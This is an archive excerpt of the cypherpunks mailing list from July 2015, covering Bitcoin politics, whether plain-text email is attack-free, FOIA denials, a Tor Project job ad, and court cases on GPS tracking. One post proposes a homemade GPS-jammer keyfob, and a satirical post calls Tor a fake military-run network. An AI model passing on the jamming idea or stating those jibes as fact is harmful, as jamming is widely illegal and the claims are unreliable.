problem. You can earn btc like you earn any other kind of money. Or you could at least if btc was a common medium of exchange. (you can of course simply buy btc) > > Secondly, the rhetoric we hear often in the mainstream btc discussion > is "it is a solution for banking the Unbanked" This talk is obviously > dodgy - lets say "the unbanked wants to be banked" But why should they? So that they can be easily monitored? THAT is dodgy too. > if you have an > account with nothing in it, and no way of filling it in, there is no > point. The only good thing about btc walled vs bank account when its > empty is that there is no one is proposing you to get an overdraft or > a loan. But still, empty btc wallet is pretty useless. > > Rather decent response to poitical btc frenzy I found in this post - > https://blog.caseykuhlman.com/entries/2014/bitcoin-somaliland.html?utm_source=feedburner&utm_medium=%24feed&utm_campaign=Feed%3A+underWater+desert+Blogging Sorry, that's a typically retarded rant against 'anarchy'. Bitcoin isn't the same thing as political anarchy so valid criticism of bitcoin isn't the same thing as valid criticism of political anarchy. "If You Want to Sit At The Adults' Table Act Like Adults" Adults know the basic meaning of words and know that the STATE of somaliland isn't 'anarchy'. Adults are intellectually honest. Unlike the author of the article you linked. > > Another mainstream talk is: its not about bitcooin, it is all about > blockchain technology. Thats correct, it can be useful for some > stuff. But what drives me up the walll is a hype around it mixed with > vagueness. Yep. It is mostly bullshit. Blockchain 'technology' (technology? it's just an algorithm) seems like a more robust version of digital signatures. And what of it? What kind of fundamental problem does a better digital signature system solve? > "We can build all this amazing socio-technical systems > with it" That is bullshit. But that bullshit is not the same as the political theory of anarchy. In other words don't confuse bitcoin with anarchy, regardless of what bitcoin pushers may say. > and very rarely, amongst general public (not blockchain > devs) you come across concrete ideas of a design. What exactly does > this weird data structure does in a very specific social context? > What are exact detailed functions it has, how does it integrates with > other layers - software and hardware. So the talk "some devs will > write cryptographically verifiable scripts for us which interact on > the blockchain and it will give the world some cool ways of > interaction" is just dangerous. Similar rhetoric brought humanity > things such as Facebook. The only thing which i consider right in the > blockchain discussion that "ok, it allows adding some features to a > system that can be useful in some particular cases" > > On the technical side: fork, xt-code etc - I would like to organise > and stream a panel discussion on WCN > channel soon-ish. I dont want to > turn cypherpunk list into a Bitcoin Talk :) but will ping a link here > and the time we will schedule it. > > From grarpamp at gmail.com Fri Jul 10 14:41:23 2015 From: grarpamp at gmail.com (grarpamp) Date: Fri, 10 Jul 2015 17:41:23 -0400 Subject: From: root@hackingteam.it To: vince@hackingteam.it [and who?] In-Reply-To: <20150710081130.GB2529@sivokote.iziade.m$> References: <20150710070020.GF61602@r4> <20150710081130.GB2529@sivokote.iziade.m$> Message-ID: On Fri, Jul 10, 2015 at 4:11 AM, Georgi Guninski wrote: > On Fri, Jul 10, 2015 at 12:17:57AM -0700, Seth wrote: >> On Fri, 10 Jul 2015 00:00:20 -0700, Tom wrote: >> >> >http://ptrace.fefe.de/fpalm30c3.jpg >> >> I actually appreciate content posted in message, get tired of having >> to fire up a browser for links. Also every click on a browser link >> is a potential attack whereas plain-text in an email is not. > > Are you sure plain-text email is not potential attack? > > There have been many bugs in text mail clients. > > IIRC shell shock affected qmail local delivery (and maybe > procmail). Affection is possible... http://www.gossamer-threads.com/lists/qmail/users/138578 Moral: Validate input and pipelines. Even if only a silly regex sanity filter on instruction metadata (email addresses), ie: [A-Za-z0-9._ at +-] mod utf-8 Security is not being liberal in what you accept. From grarpamp at gmail.com Fri Jul 10 15:26:07 2015 From: grarpamp at gmail.com (grarpamp) Date: Fri, 10 Jul 2015 18:26:07 -0400 Subject: cypherpunks Digest, Vol 25, Issue 9 In-Reply-To: References: Message-ID: On Fri, Jul 10, 2015 at 6:25 AM, ksenia bellman wrote: > [snip] - Do not top post. - Do not reply including entire bulk digests, cut them down to relavant. - Do not use "digest vol issue" as subject, use the same subject as whatever specific message in the digest you are replying to. From coderman at gmail.com Fri Jul 10 18:42:41 2015 From: coderman at gmail.com (coderman) Date: Fri, 10 Jul 2015 18:42:41 -0700 Subject: FOIPA adventures In-Reply-To: References: Message-ID: fun friday FOIA denials: FU from FBI: Rejected DRTBox Martin Peck made this request to Federal Bureau of Investigation of the United States of America. - https://www.muckrock.com/foi/united-states-of-america-10/drtbox-18541/ Rejected DRTBeBoeingBox Martin Peck made this request to Federal Bureau of Investigation of the United States of America. - https://www.muckrock.com/foi/united-states-of-america-10/drtbeboeingbox-18708/ Rejected KingFishing Martin Peck made this request to Federal Bureau of Investigation of the United States of America. - https://www.muckrock.com/foi/united-states-of-america-10/kingfishing-18594/ don't think that's the end :P best regards, From grarpamp at gmail.com Fri Jul 10 17:07:14 2015 From: grarpamp at gmail.com (grarpamp) Date: Fri, 10 Jul 2015 20:07:14 -0400 Subject: From: root@hackingteam.it To: vince@hackingteam.it [and who?] In-Reply-To: References: <20150710070020.GF61602@r4> <20150710081130.GB2529@sivokote.iziade.m$> Message-ID: On Fri, Jul 10, 2015 at 7:31 PM, Cathal (Phone) wrote: > And if your regex engine has vulns? ;) And your software, and hardware, and law... it's just defense in depth, stack em all up and hopefully one will remain standing in your favor. If not, well, time to unplug and go be a farmer. With luck your combine, market and customers will still be functional... From dan at geer.org Fri Jul 10 17:25:22 2015 From: dan at geer.org (dan at geer.org) Date: Fri, 10 Jul 2015 20:25:22 -0400 Subject: US Gov Orders Internet To Rat Out Its [Innocent] Users In-Reply-To: Your message of "Wed, 08 Jul 2015 03:40:47 -0400." Message-ID: <20150711002522.D66D92280CA@palinka.tinho.net> | The Senate Intelligence Committee secretly voted on June 24 in favor | of legislation requiring e-mail providers and social media sites to | report suspected terrorist activities. The legislation, approved 15-0 | in a closed-door hearing, remains "classified." The relevant text is | contained in the 2016 intelligence authorization... In a court of logic, this makes sense. These firms' entire business is in content inspection of one form or another plus traffic analysis of one form or another and making decisions on what they find in content or in relationships and so forth and so on, so making them incrementally responsible for what they find or could find is logical and directly so to lawmakers. Harvard Law professor Jonathan Zittrain famously noted that if you use online services that are free, "You are not the customer, you are the product." Why? Because what is observable is observed, what is observed is sold, and users are always observable, even when they are anonymous. If I were a lawmaker, I'd follow that logic just as they have. No, I don't like it, either. --dan From alfonso.degregorio at gmail.com Fri Jul 10 16:50:11 2015 From: alfonso.degregorio at gmail.com (Alfonso De Gregorio) Date: Fri, 10 Jul 2015 23:50:11 +0000 Subject: From: root@hackingteam.it To: vince@hackingteam.it [and who?] In-Reply-To: References: <20150710070020.GF61602@r4> <20150710081130.GB2529@sivokote.iziade.m$> Message-ID: On Fri, Jul 10, 2015 at 11:31 PM, Cathal (Phone) wrote: > And if your regex engine has vulns? ;) Exactly. Just consider, for instance, the long "lineage" of vulnerabilities affecting PCRE libraries. Alfonso From cathalgarvey at cathalgarvey.me Fri Jul 10 16:31:55 2015 From: cathalgarvey at cathalgarvey.me (Cathal (Phone)) Date: Sat, 11 Jul 2015 00:31:55 +0100 Subject: From: root@hackingteam.it To: vince@hackingteam.it [and who?] In-Reply-To: References: <20150710070020.GF61602@r4> <20150710081130.GB2529@sivokote.iziade.m$> Message-ID: And if your regex engine has vulns? ;) On 10 July 2015 22:41:23 GMT+01:00, grarpamp wrote: >On Fri, Jul 10, 2015 at 4:11 AM, Georgi Guninski > wrote: >> On Fri, Jul 10, 2015 at 12:17:57AM -0700, Seth wrote: >>> On Fri, 10 Jul 2015 00:00:20 -0700, Tom wrote: >>> >>> >http://ptrace.fefe.de/fpalm30c3.jpg >>> >>> I actually appreciate content posted in message, get tired of having >>> to fire up a browser for links. Also every click on a browser link >>> is a potential attack whereas plain-text in an email is not. >> >> Are you sure plain-text email is not potential attack? >> >> There have been many bugs in text mail clients. >> >> IIRC shell shock affected qmail local delivery (and maybe >> procmail). > >Affection is possible... >http://www.gossamer-threads.com/lists/qmail/users/138578 > >Moral: Validate input and pipelines. Even if only a silly regex sanity >filter on >instruction metadata (email addresses), ie: [A-Za-z0-9._ at +-] mod utf-8 >Security is not being liberal in what you accept. -- Sent from my Android device with K-9 Mail. Please excuse my brevity. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1989 bytes Desc: not available URL: From hozer at hozed.org Sat Jul 11 07:01:12 2015 From: hozer at hozed.org (Troy Benjegerdes) Date: Sat, 11 Jul 2015 09:01:12 -0500 Subject: speaking of Bitcoin ... the july4th split In-Reply-To: References: Message-ID: <20150711140112.GA27932@nl.grid.coop> On Mon, Jul 06, 2015 at 04:06:36AM +0900, Lodewijk andré de la porte wrote: > Half the net is SPV... MINING??? > > They got what they had coming, though. > > Very strange to not spend a tease on full validation :s > > Maybe they hope to save some time and start mining that new block earlier? > Seems they lost quite a bit more than they might've ever saved now. Give me a large mining pool with a dedicated low-latency (worldwide) network and I bet I can show a marginally higher rate of return (more blocks) by running SPV mining software. What's unknown is if the network + wrong-fork costs exceed the return from being able to start mining a new block sooner or not. This is a very small advantage with Bitcoin. But with any short-block coin (litecoin) or the 1-minute altcoins, seconds (or maybe even milliseconds) matter. On the 1-minute alts you could have 40% of the hashpower and probably get 60-80% of the blocks by starting mining earlier and then mining on top of blocks you just found. From hozer at hozed.org Sat Jul 11 07:34:01 2015 From: hozer at hozed.org (Troy Benjegerdes) Date: Sat, 11 Jul 2015 09:34:01 -0500 Subject: Bitcoin philosophical musings and pressures 7 years in [drifted from: txrate, forking, etc] In-Reply-To: <559ca80a.e40f370a.1ccb2.17c7@mx.google.com> References: <559c4b24.d6a48c0a.a6394.0140@mx.google.com> <559c5f23.c328370a.7776d.1c71@mx.google.com> <559c93ca.656b8c0a.4ba8.2f81@mx.google.com> <559C9E94.8010603@riseup.net> <559ca80a.e40f370a.1ccb2.17c7@mx.google.com> Message-ID: <20150711143401.GB27932@nl.grid.coop> On Wed, Jul 08, 2015 at 01:33:33AM -0300, Juan wrote: > On Tue, 07 Jul 2015 20:52:52 -0700 > odinn wrote: > > > Satoshi was > > apparently thinking about that same issue, of a decentralized market > > within bitcoin, but it just didn't get finished. > > > > And in February of 2010, it was stripped out of bitcoin. > > > > (Insert ripping sound here.) > > > > https://github.com/bitcoin/bitcoin/commit/5253d1ab77fab1995ede03fb934edd > > 67f1359ba8 > > > > Go OpenBazaar, etc. They (and some other similar projects) are > > carrying the torch of decentralized marketplaces that don't require > > legacy institutions to operate. > > > > Thanks. I wasn't aware that the decentralized marketplace > problem was being worked on at that time and by Satoshi. > Interesting. > So what do we need to put that back in to a working cryptocoin? I see all this nonsense about putting stuff 'on top of' bitcoin, but it seems like it really ought to be integrated, or if not integrated, at least follow the unix philosphy of individual tools you can compose together. Libbitcoin seems to have had that 'tools' approach, but it appears to have no use case, and can you even mine an altchain with it? From hozer at hozed.org Sat Jul 11 07:51:51 2015 From: hozer at hozed.org (Troy Benjegerdes) Date: Sat, 11 Jul 2015 09:51:51 -0500 Subject: From: root@hackingteam.it To: vince@hackingteam.it [and who?] In-Reply-To: References: <20150710070020.GF61602@r4> <20150710081130.GB2529@sivokote.iziade.m$> Message-ID: <20150711145151.GD27932@nl.grid.coop> On Fri, Jul 10, 2015 at 08:07:14PM -0400, grarpamp wrote: > On Fri, Jul 10, 2015 at 7:31 PM, Cathal (Phone) > wrote: > > And if your regex engine has vulns? ;) > > And your software, and hardware, and law... it's just defense > in depth, stack em all up and hopefully one will remain standing > in your favor. If not, well, time to unplug and go be a farmer. > With luck your combine, market and customers will still be functional... ROTFL that's funny. I won't argue with go be a farmer, but the whole unplug bit would leave me with a lot of leftovers. The antigue combine will work, but what good is 50 tons of corn if I can't get it to China? I can't drink that much moonshine myself. Go be a farmer and work on fabricating silicon in your #farmcmos fab. (did you know corncobs have enough silicia to be good abrasives?) -- ---------------------------------------------------------------------------- Troy Benjegerdes 'da hozer' hozer at hozed.org 7 elements earth::water::air::fire::mind::spirit::soul grid.coop Never pick a fight with someone who buys ink by the barrel, nor try buy a hacker who makes money by the megahash From Rayzer at riseup.net Sat Jul 11 12:55:06 2015 From: Rayzer at riseup.net (Razer) Date: Sat, 11 Jul 2015 12:55:06 -0700 Subject: cypherpunks Digest, Vol 25, Issue 9 In-Reply-To: References: Message-ID: <55A1749A.1060808@riseup.net> On 07/10/2015 03:26 PM, grarpamp wrote: > On Fri, Jul 10, 2015 at 6:25 AM, ksenia bellman wrote: >> [snip] > > - Do not reply including entire bulk digests, cut them down to relavant. [Snigger] No one pays by the byte anymore (...coderman). [extracting tongue from cheek] RR -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 819 bytes Desc: OpenPGP digital signature URL: From tom at ritter.vg Sat Jul 11 12:19:59 2015 From: tom at ritter.vg (Tom Ritter) Date: Sat, 11 Jul 2015 14:19:59 -0500 Subject: progression of technologies In-Reply-To: <20150710155812.D78CF2281ED@palinka.tinho.net> References: <20150710155812.D78CF2281ED@palinka.tinho.net> Message-ID: On 10 July 2015 at 10:58, wrote: > Well, now we are into dueling Supreme Court cases; see > > http://caselaw.findlaw.com/us-supreme-court/533/27.html > > Kyllo v. United States (2001) > > Despite the Court's attempt to draw a line that is "not only > firm but also bright," ante, at 12, the contours of its new rule > are uncertain because its protection apparently dissipates as > soon as the relevant technology is "in general public use," ante, > at 6-7. Yet how much use is general public use is not even hinted > at by the Court's opinion, which makes the somewhat doubtful > assumption that the thermal imager used in this case does not > satisfy that criterion. In any event, putting aside its lack > of clarity, this criterion is somewhat perverse because it seems > likely that the threat to privacy will grow, rather than recede, > as the use of intrusive equipment becomes more readily available. Yes! That's the case I was obliquely referring to. Sorry, I kind of glazed over that part of your argument in the article. > That reads, to me, that what the public adopts limits what I can > do or expect. I guess where we quibble is I'm skeptical that the general public (as defined by the courts?) will (ever?) adopt the types of tools you refer to (uniquely identifying individuals based on electromagnetics, tracking tire pressure sensors.) I don't think the 'general public' has adopted thermal imagers. These will make their way into industry... (advertisers tracking WiFi probes in malls obviously). So my wonder now is if industry adopting a technology is sufficient for the courts to qualify as 'general public'. But this, at best, only affects exotic technology. We're already fighting this battle. Automated license plate readers have never (?) been challenged (successfully?). They are an extension of "a police officer just watching a highway" which is legal. And the courts like extensions of things that are already done - see bulk collection of metadata! You're right - collection of this data by personals or corporations, and selling it, is indeed the right battleground. I'm don't think the answer is correlation, but the collection, as you say in the last paragraph. -tom From Rayzer at riseup.net Sat Jul 11 15:49:46 2015 From: Rayzer at riseup.net (Razer) Date: Sat, 11 Jul 2015 15:49:46 -0700 Subject: Fwd: Executive Director Needed, Tor Project In-Reply-To: References: Message-ID: <55A19D8A.6050300@riseup.net> -------- Forwarded Message -------- Subject: Fwd: Executive Director, Tor Project Date: Fri, 10 Jul 2015 17:00:47 -0700 From: Ilya Mouzykantskii Reply-To: liberationtech To: bscs at cs.stanford.edu, liberationtech at lists.stanford.edu CC: Larry Diamond Newsgroups: gmane.technology.liberationtech References: One of the most important jobs in the post-Snowden tech world. Forward widely! ---------- Forwarded message ---------- From: *Rob Reich* > Date: Fri, Jul 10, 2015 at 11:11 AM Subject: Executive Director, Tor Project To: interestingjobs at lists.stanford.edu Hello all, The Tor Project aims to guarantee privacy and open communications online. Their signature product is the Tor Browser. https://www.torproject.org Please share this announcement widely. Rob http://www.fossjobs.net/job/6669/executive-director-at-torproject-inc/ The Situation The Tor Project, one of the world’s strongest advocates for privacy and anonymous, open communications is currently seeking an experienced Executive Director to take the helm. The new Executive Director will spearhead key initiatives to make the organization even more robust in its fight to advance human rights and freedoms by creating and deploying anonymity and privacy technologies, advancing their scientific and popular understanding, and encouraging their use. The Position The position provides the high-profile opportunity to assume the voice and face of Tor to the world, and particularly to the global community of Internet organizations dedicated to maintaining a stable, secure and private Internet. In this position, the successful candidate will be able to exercise their deep leadership experience to manage a virtual team of culturally diverse volunteer developers. The candidate will have the opportunity to draw support from their stature in the wider community of Internet privacy foundations and activist organizations to advance external development initiatives The Organization Founded in 2006, this 501(c)(3) research NGO, provides free software that enables anonymous Internet communication world-wide. Tor?s mission is to return control over Internet security and privacy to users. Tor?s members, users, and sponsors include governmental and nongovernmental organizations, the US Navy, Indymedia, Electronic Frontier Foundation, journalists and media organizations, corporations and law enforcement organizations. The Tor Project received the Free Software Foundation's 2010 Award for Projects of Social Benefit. The Ideal Candidate The ideal candidate will dive head first into the activities of advocacy for the Internet privacy movement. They will enjoy exercising their strong network of connections in fundraising efforts. They will take satisfaction in establishing a highly collaborative and productive culture in a volunteer-driven, virtual organization and will appreciate the opportunity to build consensus among diverse cultural groups as they all work toward the common mission and goal. The successful candidate will have a passion for the ideals behind Internet privacy and welcome the opportunity to make strides for the cause to establish anonymous Internet communications. The Opportunity The successful candidate will welcome the opportunity to create an organizational culture that creates conditions and infrastructures vital for Tor?s continued success and relevance to the cause. This is a chance to be known for leadership agility at the helm of an organization forefront in the drive to enable free, private, non-censored Internet communication for citizens everywhere. The Compensation As leader of the Tor team, the successful candidate receives a highly competitive compensation package. If you know someone who might be interested, please call, or ask them to call. Judy Tabak The Wentworth Company 479 West Sixth Street, San Pedro, CA 90731 (310) 732-2321 JudyTabak at wentco.com -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 819 bytes Desc: OpenPGP digital signature URL: From jya at pipeline.com Sat Jul 11 13:41:26 2015 From: jya at pipeline.com (John Young) Date: Sat, 11 Jul 2015 16:41:26 -0400 Subject: progression of technologies In-Reply-To: References: <20150710155812.D78CF2281ED@palinka.tinho.net> Message-ID: This is productive discussion for addressing what's happening now and coming up in the race between law and technology, cartoonishly in the press as between whales and germs, more realisticly, the two swapping places, running different races, taking short-cuts, indicting, pleading, inforning, lying, bribing, cheating, rigging races, hiring assassins and stand-ins, dual hats, wild cards, lone wolves, entrapment, duplicity, megadeath threats, hacks, injections, implantations, porous treaties, incessant violations, and above all evergrowing heaping piles of dung of the devil. Concentration of wealth by lawful cheating is comparable to explosively squeezing the pit to see if the atmosphere ignites. At 03:19 PM 7/11/2015, you wrote: >On 10 July 2015 at 10:58, wrote: > > Well, now we are into dueling Supreme Court cases; see > > > > http://caselaw.findlaw.com/us-supreme-court/533/27.html > > > > Kyllo v. United States (2001) > > > > Despite the Court's attempt to draw a line that is "not only > > firm but also bright," ante, at 12, the contours of its new rule > > are uncertain because its protection apparently dissipates as > > soon as the relevant technology is "in general public use," ante, > > at 6-7. Yet how much use is general public use is not even hinted > > at by the Court's opinion, which makes the somewhat doubtful > > assumption that the thermal imager used in this case does not > > satisfy that criterion. In any event, putting aside its lack > > of clarity, this criterion is somewhat perverse because it seems > > likely that the threat to privacy will grow, rather than recede, > > as the use of intrusive equipment becomes more readily available. > >Yes! That's the case I was obliquely referring to. Sorry, I kind of >glazed over that part of your argument in the article. > > > That reads, to me, that what the public adopts limits what I can > > do or expect. > >I guess where we quibble is I'm skeptical that the general public (as >defined by the courts?) will (ever?) adopt the types of tools you >refer to (uniquely identifying individuals based on electromagnetics, >tracking tire pressure sensors.) I don't think the 'general public' >has adopted thermal imagers. These will make their way into >industry... (advertisers tracking WiFi probes in malls obviously). > >So my wonder now is if industry adopting a technology is sufficient >for the courts to qualify as 'general public'. But this, at best, only >affects exotic technology. We're already fighting this battle. > >Automated license plate readers have never (?) been challenged >(successfully?). They are an extension of "a police officer just >watching a highway" which is legal. And the courts like extensions of >things that are already done - see bulk collection of metadata! > >You're right - collection of this data by personals or corporations, >and selling it, is indeed the right battleground. I'm don't think the >answer is correlation, but the collection, as you say in the last >paragraph. > >-tom From griffin at cryptolab.net Sat Jul 11 18:44:44 2015 From: griffin at cryptolab.net (Griffin Boyce) Date: Sat, 11 Jul 2015 21:44:44 -0400 Subject: Executive Director Needed, Tor Project In-Reply-To: <55a1c2a6.51958c0a.0522.ffff8e16@mx.google.com> References: <55A19D8A.6050300@riseup.net> <55a1c2a6.51958c0a.0522.ffff8e16@mx.google.com> Message-ID: <90b7e493c2083965919e8fb549c3b016@cryptolab.net> Juan wrote: > Zenaan Harkness wrote: >> Juan for Executive Director, position soon to be retitled as >> Sanity Director :) > > heh ;) Whoa whoa whoa. We all know that Vermin Supreme is the community favorite to become the next Tor E.D. Juan's got no chance. ~Griffin From juan.g71 at gmail.com Sat Jul 11 18:28:43 2015 From: juan.g71 at gmail.com (Juan) Date: Sat, 11 Jul 2015 22:28:43 -0300 Subject: Executive Director Needed, Tor Project In-Reply-To: References: <55A19D8A.6050300@riseup.net> Message-ID: <55a1c2a6.51958c0a.0522.ffff8e16@mx.google.com> On Sun, 12 Jul 2015 00:27:41 +0000 Zenaan Harkness wrote: > Juan! Juan!! Juan!!! > > Juan for Executive Director, position soon to be retitled as > Sanity Director :) heh ;) > > While we're at it: Juan for presidenté! Thank You Zenaan. Yes, I've been thinking about these problems. What we first need is an anarchist state. The government of our anarchist might require some sort of leadership (otherwise chaos would ensue), but I think the "president" title is a bit too authoritarian. Therefore I won't be El Presidente but a Sultan (Sultan es-Selatin) And of course Zenaan, I hereby grant you the honor of being our Greatest-Grand-Vizier =) Now, since ours is an anarchist cypherpunk state, mostly concerned with defending the cyber-rights of the masses, we need to get as much funding as possible from the Pentangon. The millions we get from the pentagon will be used to create a fake anonimity network which is actually used to promote the interests of the US military and US corporations. I think a fitting name for such a criminal endeavor, I mean humanitarian community is : "The Tor Project". Our anarchist state must have other assets too. For instance, we could hire some high ranking CIA officials. I tend to like people whose initials are DG. Like, I don't know, Dan Geer. And, our state needs an official 'decentralized' medium of exchange. I propose bitcoin! Bitcoin is now really maturing into a robust system backed by just the right people. https://blog.xapo.com/announcing-xapos-advisory-board/ So, this is it. Ah, a nice touch might be a mailing list in which random people praise the marines. And other random people defend the marines admirers from unfair attacks. > > :D > > Love you bro, > Zenaan > > > > Subject: Fwd: Executive Director, Tor Project > > Date: Fri, 10 Jul 2015 17:00:47 -0700 > > > One of the most important jobs in the post-Snowden tech world. > ... > From coderman at gmail.com Sun Jul 12 00:20:30 2015 From: coderman at gmail.com (coderman) Date: Sun, 12 Jul 2015 00:20:30 -0700 Subject: speaking of Bitcoin ... the july4th split In-Reply-To: <20150711140112.GA27932@nl.grid.coop> References: <20150711140112.GA27932@nl.grid.coop> Message-ID: On 7/11/15, Troy Benjegerdes wrote: > ... > Give me a large mining pool with a dedicated low-latency (worldwide) > network and I bet I can show a marginally higher rate of return... a malicious advantage; that's what we've not seen taken opportunity of yet... From coderman at gmail.com Sun Jul 12 00:23:44 2015 From: coderman at gmail.com (coderman) Date: Sun, 12 Jul 2015 00:23:44 -0700 Subject: From: root@hackingteam.it To: vince@hackingteam.it [and who?] In-Reply-To: <20150711145151.GD27932@nl.grid.coop> References: <20150710070020.GF61602@r4> <20150710081130.GB2529@sivokote.iziade.m$> <20150711145151.GD27932@nl.grid.coop> Message-ID: On 7/11/15, Troy Benjegerdes wrote: > ... > I won't argue with go be a farmer, but the whole unplug bit would leave > me with a lot of leftovers. as a farmer with 7 horses, 9 goats, 3 chickens, 3 dogs, 6 cats, the trick is to do both. or actually all four? future is full of more jobs than one. we're living on borrowed time. best regards, From zen at freedbms.net Sat Jul 11 17:27:41 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Sun, 12 Jul 2015 00:27:41 +0000 Subject: Executive Director Needed, Tor Project In-Reply-To: <55A19D8A.6050300@riseup.net> References: <55A19D8A.6050300@riseup.net> Message-ID: Juan! Juan!! Juan!!! Juan for Executive Director, position soon to be retitled as Sanity Director :) While we're at it: Juan for presidenté! :D Love you bro, Zenaan > Subject: Fwd: Executive Director, Tor Project > Date: Fri, 10 Jul 2015 17:00:47 -0700 > One of the most important jobs in the post-Snowden tech world. ... From coderman at gmail.com Sun Jul 12 00:33:55 2015 From: coderman at gmail.com (coderman) Date: Sun, 12 Jul 2015 00:33:55 -0700 Subject: FOIPA adventures In-Reply-To: References: Message-ID: ready to spend a fortune to see this through. next move FBI? https://www.muckrock.com/foi/united-states-of-america-10/metadataz-19638/ """ FOIA processing notes associated with requests #1331086-000, #1331360-000, #1331082-000. Please include processing notes for this request, even if request is denied in part. Please identify individuals responsible for any aspect of FOIA processing in the processing notes, along with explanation of their involvement if not typically assigned FOIA responsibilities for the record systems above. """ On 7/10/15, coderman wrote: > fun friday FOIA denials: > > FU from FBI: > > > Rejected > DRTBox > Martin Peck made this request to Federal Bureau of Investigation of > the United States of America. > - https://www.muckrock.com/foi/united-states-of-america-10/drtbox-18541/ > > > Rejected > DRTBeBoeingBox > Martin Peck made this request to Federal Bureau of Investigation of > the United States of America. > - > https://www.muckrock.com/foi/united-states-of-america-10/drtbeboeingbox-18708/ > > > Rejected > KingFishing > Martin Peck made this request to Federal Bureau of Investigation of > the United States of America. > - > https://www.muckrock.com/foi/united-states-of-america-10/kingfishing-18594/ > > > don't think that's the end :P > > > > best regards, > From guninski at guninski.com Sun Jul 12 03:10:50 2015 From: guninski at guninski.com (Georgi Guninski) Date: Sun, 12 Jul 2015 13:10:50 +0300 Subject: Someone recommends the movie "Inequality for All" Message-ID: <20150712101050.GA2534@sivokote.iziade.m$> Someone who watches a lot of movies recommends Inequality for All http://www.imdb.com/title/tt2215151/ === A documentary that follows former U.S. Labor Secretary Robert Reich as he looks to raise awareness of the country's widening economic gap. === I haven't watched it yet. From vbotka at gmail.com Sun Jul 12 05:28:41 2015 From: vbotka at gmail.com (Vladimir Botka) Date: Sun, 12 Jul 2015 14:28:41 +0200 Subject: Someone recommends the movie "Inequality for All" In-Reply-To: <20150712101050.GA2534@sivokote.iziade.m$> References: <20150712101050.GA2534@sivokote.iziade.m$> Message-ID: <20150712142841.73ba66b3@planb.netng.org> Hi Georgi, all On Sun, 12 Jul 2015 13:10:50 +0300 Georgi Guninski wrote: > Someone who watches a lot of movies recommends > Inequality for All > http://www.imdb.com/title/tt2215151/ > === > A documentary that follows former U.S. Labor Secretary Robert Reich as > he looks to raise awareness of the country's widening economic gap. > === > I haven't watched it yet. For those interested, it might be a good idea to review also the recent publication on this topic. http://www.economist.com/news/books-and-arts/21653596-anthony-atkinson-godfather-inequality-research-growing-problem-mind-gap "The author does not mind speaking uncomfortable truths." Regards, Vladimír Botka -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 473 bytes Desc: OpenPGP digital signature URL: From wirelesswarrior at safe-mail.net Sun Jul 12 13:18:42 2015 From: wirelesswarrior at safe-mail.net (wirelesswarrior at safe-mail.net) Date: Sun, 12 Jul 2015 16:18:42 -0400 Subject: progression of technologies Message-ID: -------- Original Message -------- From: jim bell Apparently from: cypherpunks-bounces at cpunks.org To: Tom Ritter , "dan at geer.org" Cc: cpunks Subject: Re: progression of technologies Date: Sun, 12 Jul 2015 18:53:15 +0000 (UTC) It would seem that a GPS jammer keyfob, that could be turned off when desired, would do the trick. The GPS signal at ground level is very weak and only works due to a huge process gain. Narrowband jamming will desensitize the closeby tracker's front end easily countering that process gain without jamming more distanrt GPS receivers. Building such a jammer from cheap and available components should be easy. > > > From: Tom Ritter > On 10 July 2015 at 10:58, wrote: > > >> Well, now we are into dueling Supreme Court cases; see > >> > >> http://caselaw.findlaw.com/us-supreme-court/533/27.html > >> Kyllo v. United States (2001) > >> Despite the Court's attempt to draw a line that is "not only > >> firm but also bright," ante, at 12, the contours of its new rule > >> are uncertain because its protection apparently dissipates as > >> soon as the relevant technology is "in general public use," ante, > >> at 6-7. Yet how much use is general public use is not even hinted > >> at by the Court's opinion, which makes the somewhat doubtful > >> assumption that the thermal imager used in this case does not > >> satisfy that criterion. In any event, putting aside its lack > >> of clarity, this criterion is somewhat perverse because it seems > >> likely that the threat to privacy will grow, rather than recede, > >> as the use of intrusive equipment becomes more readily available. > > >Yes! That's the case I was obliquely referring to. Sorry, I kind of > >glazed over that part of your argument in the article. > > > That reads, to me, that what the public adopts limits what I can > > do or expect. > > >I guess where we quibble is I'm skeptical that the general public (as > >defined by the courts?) will (ever?) adopt the types of tools you > >refer to (uniquely identifying individuals based on electromagnetics, > >tracking tire pressure sensors.) I don't think the 'general public' > >has adopted thermal imagers. These will make their way into > >industry... (advertisers tracking WiFi probes in malls obviously). > > Months ago, FLIR announced an IR-imaging add-on for IPhones, which is tiny. However, just a month or two ago I saw a media reference to a (very tiny) T-shaped device, intended to plug into the micro-USB jack of a cell phone, that did IR imaging. As I recall, very economical, but even then the majority of the population won't buy, simply because they have no need for such a thing most of the time. > > > > > > >So my wonder now is if industry adopting a technology is sufficient > >for the courts to qualify as 'general public'. But this, at best, only > >affects exotic technology. We're already fighting this battle. > > >Automated license plate readers have never (?) been challenged > >(successfully?). They are an extension of "a police officer just > >watching a highway" which is legal. And the courts like extensions of > >things that are already done - see bulk collection of metadata! > > > This 'extension' principle doesn't always work. In 2012, the Supreme Court ruled (US v. Jones) https://www.law.cornell.edu/wex/united_states_v._jones_%282012%29 that police could not place a GPS tracking device on a car without a warrant. One argument that has been rejected in lower-court cases was the idea that in principle, a car's movements could be tracked with an army of police, one per street corner, so that a GPS tracking bug simply automated that process. One problem that argument is that society not only doesn't have the resources to accomplish such a blanket coverage of an area, and that even if practical, society may not necessarily want such an intrusive system to exist. > > This issue was (secretly) quite relevant to me. Federal authorities apparently installed a tracking device on a car I used, probably in about April 2000, without a warrant. Presumably, if challenged they would have been claiming to follow a 9th Circuit Court of Appeals decision from 1999, U.S. v. McIver, which had allowed the placement of a GPS tracking device on a truck seen at the location of a marijuana growing operation. The problem with this justification, however, is that at least in McIver, there was an actual crime involved, and the truck was plausibly involved in that crime. In my case, after my release from prison in April 2000, nobody alleged that I was engaging in any crime. The McIver case didn't rule that police could simply choose to place a GPS tracking device on ANY car, for no reason, and even without 'probable cause' or 'reasonable suspicion'. > > What was particularly devious (and I call illegal) was that later, probably in October 2000, the Feds actually obtained a warrant for the placement of ANOTHER tracking device on the same car (which, of course, may have ended up being the same device!) WITHOUT telling the judge that a tracking device was already on the car, and had been so since at least as early as April 2000. Why the subterfuge? They later used the result of the tracking device (at least, the portion taken after the October warrant) against me in court. But they continued to conceal the fact that a GPS device had been placed since perhaps April 2000. Presumably, they concealed that because they would have had to explain, in court, why they were tracking me, without a warrant, and despite the fact that they had no 